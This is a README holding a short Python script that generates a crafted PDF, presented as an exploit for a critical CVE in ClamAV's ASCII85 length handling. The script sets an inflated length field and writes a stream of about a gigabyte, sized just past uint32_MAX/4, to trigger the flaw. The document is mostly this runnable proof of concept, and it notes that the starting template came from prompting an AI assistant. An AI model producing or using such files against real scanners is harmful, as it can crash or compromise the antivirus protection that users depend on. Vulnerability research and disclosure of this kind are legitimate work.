README.md
Rendering markdown...
# Exploit generator for CVE-2025-20260 (CVSS Score 9.3 Critical)
# Citation: MS Copilot prompt: "give me an example of a PDF
# with ascii85-encoded text", Oct 21, 2025
# This template was then tampered with (removing clutter, increasing length field),
# and adding all the "4"'s because ClamAV seems to need a second integer for
# its length reader to work. And then finally, the ascii85 stream
# is just slightly longer than uint32_MAX / 4 worth of "A".
# Start of PDF file
start = b'''%PDF-1.4
1 0 obj
<< /Length 1073741824 444444444444 /Filter /ASCII85Decode >>
stream
'''
# End of PDF file
end = b'''endstream
endobj
2 0 obj
10
endobj
xref
0 3
0000000000 65535 f
0000000010 00000 n
0000000075 00000 n
trailer
<< /Size 3 /Root 1 0 R >>
startxref
100
%%EOF
'''
# Adding appropriate length ascii85 stream
with open("clam-cve.pdf", "wb") as exploit:
exploit.write(start)
for i in range(0,1073741825, 5):
exploit.write(b"hS?8M")
exploit.write(end)